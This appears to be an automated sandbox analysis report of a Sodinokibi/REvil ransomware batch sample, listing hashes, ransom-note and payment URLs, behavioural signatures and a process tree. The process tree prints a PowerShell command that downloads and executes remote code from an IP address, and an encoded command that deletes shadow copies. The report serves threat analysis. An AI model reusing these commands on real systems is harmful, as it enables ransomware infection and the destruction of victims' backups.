Analysis
-
max time kernel
40s -
max time network
61s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
b4c987a88b89ef8fa5c5aeba0b67be50.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
b4c987a88b89ef8fa5c5aeba0b67be50.bat
Resource
win10v200430
General
-
Target
b4c987a88b89ef8fa5c5aeba0b67be50.bat
-
Size
213B
-
MD5
4eb17a9cecc3bdbd9c5f740e178603f1
-
SHA1
2789a656216c376ff49aad51a0371dd670332170
-
SHA256
ce07460453840eb7611281737273b06d33142f8a78b30717f3a197de5471d2a7
-
SHA512
1c771152007dacdd546e9f365dfc5221ba89223e5ecf63d2f14865bd71d7df5030331d3d794db13db7e4fd26f9825a2b02ceba7972b92c9da9f2d920ede55023
Malware Config
Extracted
http://185.103.242.78/pastes/b4c987a88b89ef8fa5c5aeba0b67be50
Extracted
C:\lu34t0c25-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D9F8304DE20EF488
http://decryptor.cc/D9F8304DE20EF488
Signatures
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 608 wrote to memory of 1412 608 cmd.exe powershell.exe PID 1412 wrote to memory of 1048 1412 powershell.exe powershell.exe PID 1412 wrote to memory of 1048 1412 powershell.exe powershell.exe PID 1412 wrote to memory of 1048 1412 powershell.exe powershell.exe PID 1412 wrote to memory of 1048 1412 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1412 powershell.exe Token: SeDebugPrivilege 1412 powershell.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeBackupPrivilege 752 vssvc.exe Token: SeRestorePrivilege 752 vssvc.exe Token: SeAuditPrivilege 752 vssvc.exe Token: SeTakeOwnershipPrivilege 1412 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Drops file in Program Files directory 18 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\LockSelect.ppsm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\lu34t0c25-readme.txt powershell.exe File opened for modification \??\c:\program files\SuspendRestore.3gp powershell.exe File opened for modification \??\c:\program files\UseAssert.svgz powershell.exe File opened for modification \??\c:\program files\RegisterDebug.php powershell.exe File opened for modification \??\c:\program files\StepConvert.mpeg powershell.exe File opened for modification \??\c:\program files\SwitchMount.pptm powershell.exe File created \??\c:\program files\lu34t0c25-readme.txt powershell.exe File opened for modification \??\c:\program files\ConnectSet.kix powershell.exe File opened for modification \??\c:\program files\ConvertFromResize.dotx powershell.exe File opened for modification \??\c:\program files\InitializeReceive.css powershell.exe File created \??\c:\program files (x86)\lu34t0c25-readme.txt powershell.exe File opened for modification \??\c:\program files\AssertRemove.eps powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\lu34t0c25-readme.txt powershell.exe File opened for modification \??\c:\program files\InvokeSave.pub powershell.exe File opened for modification \??\c:\program files\StepSave.dotm powershell.exe File opened for modification \??\c:\program files\TraceBackup.m1v powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\lu34t0c25-readme.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1412 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1412 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\l1i8wl767n.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1048 powershell.exe 1048 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe 1412 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\b4c987a88b89ef8fa5c5aeba0b67be50.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b4c987a88b89ef8fa5c5aeba0b67be50');Invoke-SCAPEB;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
PID:1412 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1048
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:752